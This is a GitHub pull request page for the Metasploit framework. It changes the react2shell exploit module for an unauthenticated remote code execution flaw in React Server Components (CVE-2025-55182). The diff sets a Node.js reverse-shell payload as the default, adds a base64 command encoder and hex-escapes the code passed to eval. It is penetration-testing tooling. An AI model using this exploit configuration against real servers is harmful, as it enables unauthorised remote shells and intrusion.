Skip to content

Change react2shell default encoder and payload #20773

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
smcintyre-r7 merged 3 commits into from
Dec 15, 2025
Merged

Change react2shell default encoder and payload #20773

Show file tree
Hide file tree
Changes from 2 commits
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
ca2ac75
Change react2shell default encoder
jheysel-r7 Dec 12, 2025
ff188b8
Update regex
jheysel-r7 Dec 15, 2025
0589121
Update payload options
jheysel-r7 Dec 15, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion lib/msf/core/payload/nodejs.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -85,6 +85,6 @@ def nodejs_reverse_tcp(opts={})
# @param [String] code the javascript code to run
# @return [String] a command that invokes "node" and passes the code
def nodejs_cmd(code)
"node -e 'eval(\"#{Rex::Text.to_hex(code, "\\x")}\");'"
"node -e 'eval(\"#{code.gsub(/[^a-z0-9\s]/i) { |char| Rex::Text.to_hex(char, '\\x') }}\");'"
end
end
8 changes: 5 additions & 3 deletions modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -32,16 +32,17 @@ def initialize(info = {})
['URL', 'https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components'],
['URL', 'https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3']
],
'Platform' => ['multi'],
'Platform' => %w[unix linux win],
Copy link
Contributor

@jvoisin jvoisin Dec 15, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why not 'multi'?

Copy link
Contributor Author

@jheysel-r7 jheysel-r7 Dec 15, 2025

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Although it's placed in the exploits/multi folder, the platforms should be explicitly defined like so

'Arch' => [ARCH_CMD],
'Targets' => [
[
'Unix Command',
{
'Platform' => ['unix', 'linux'],
'DefaultOptions' => {
'FETCH_COMMAND' => 'WGET'
'PAYLOAD' => 'cmd/unix/reverse_nodejs'
}
# Tested with cmd/unix/reverse_nodejs
# Tested with cmd/unix/reverse_bash
# Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
Expand All @@ -55,7 +56,8 @@ def initialize(info = {})
],
],
'Payload' => {
'BadChars' => '"'
'BadChars' => '"',
'Encoder' => 'cmd/base64'
},
'DefaultTarget' => 0,
'DisclosureDate' => '2025-12-03',
Expand Down
Loading